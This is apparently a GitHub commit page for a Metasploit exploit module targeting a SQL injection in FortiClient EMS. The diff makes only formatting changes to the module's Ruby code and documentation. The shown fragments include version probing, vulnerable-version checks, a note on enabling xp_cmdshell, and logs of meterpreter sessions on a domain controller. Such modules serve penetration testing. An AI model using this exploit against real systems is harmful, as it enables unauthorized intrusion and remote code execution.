Skip to content

Commit c05aebe

Browse files
jheysel-r7jheysel-r7
committed
Formatting
1 parent e9cbb92 commit c05aebe

File tree

2 files changed

+9
-11
lines changed

2 files changed

+9
-11
lines changed

documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -167,7 +167,7 @@ Meterpreter : x64/windows
167167
meterpreter >
168168
```
169169

170-
# FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
170+
### FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
171171
```
172172
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
173173
rhosts => 172.16.199.200
@@ -266,4 +266,4 @@ Domain : KERBEROS
266266
Logged On Users : 9
267267
Meterpreter : x64/windows
268268
meterpreter >
269-
```
269+
```

modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb

Lines changed: 7 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -72,7 +72,7 @@ def initialize(info = {})
7272

7373
def get_register_info
7474
if @version >= Rex::Version.new('7.2')
75-
vprint_status("Returning SYSINFO for 7.2 target")
75+
vprint_status('Returning SYSINFO for 7.2 target')
7676
register_info = <<~REGISTER_INFO
7777
FCTOS=WIN64
7878
OSVER=Microsoft Windows 10 Professional Edition, 64-bit (build 19045)
@@ -123,7 +123,7 @@ def get_register_info
123123
EP_APPCTRLCHKSUM=0
124124
REGISTER_INFO
125125
else
126-
vprint_status("Returning SYSINFO for 7.0 target")
126+
vprint_status('Returning SYSINFO for 7.0 target')
127127
register_info = <<~REGISTER_INFO
128128
AVSIG_VER=1.00000
129129
REG_KEY=_
@@ -176,7 +176,7 @@ def get_register_info
176176
Rex::Text.encode_base64(register_info)
177177
end
178178

179-
def get_version
179+
def get_version
180180
message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD\n"
181181
message << "SIZE= {SIZE_PLACEHOLDER}\n"
182182
message << "X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|\n"
@@ -193,9 +193,9 @@ def get_version
193193
# 7.0.7:
194194
# FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
195195
if buf =~ /EMSVER\|(\d{2})(\d{2})(\d{3})\|/
196-
major = ($1.to_i / 10)
197-
minor = $2.to_i
198-
patch = $3.to_i
196+
major = (::Regexp.last_match(1).to_i / 10)
197+
minor = ::Regexp.last_match(2).to_i
198+
patch = ::Regexp.last_match(3).to_i
199199
return Rex::Version.new("#{major}.#{minor}.#{patch}")
200200
end
201201
nil
@@ -222,7 +222,6 @@ def get_message(sqli)
222222
end
223223

224224
def send_message(message)
225-
226225
vprint_status("Sending the following message:\n #{message}")
227226

228227
buf = ''
@@ -240,21 +239,20 @@ def send_message(message)
240239
end
241240

242241
def check
243-
244242
@version = get_version
245243
return CheckCode::Unknown("#{peer} - Version info was unable to be extracted from the target. FmcDaemon.exe might not be running.") unless @version
246244

247245
if @version.between?(Rex::Version.new('7.2.0'), Rex::Version.new('7.2.2')) || @version.between?(Rex::Version.new('7.0.1'), Rex::Version.new('7.0.10'))
248246
return CheckCode::Appears("Version detected: #{@version}")
249247
end
248+
250249
CheckCode::Safe("Version detected: #{@version}")
251250
end
252251

253252
def fully_url_encode(string)
254253
string.chars.map { |char| '%' + char.ord.to_s(16).upcase }.join
255254
end
256255

257-
258256
def exploit
259257
# Things to note:
260258
# 1. xp_cmdshell is disabled by default so we must enable it.

0 commit comments

Comments
 (0)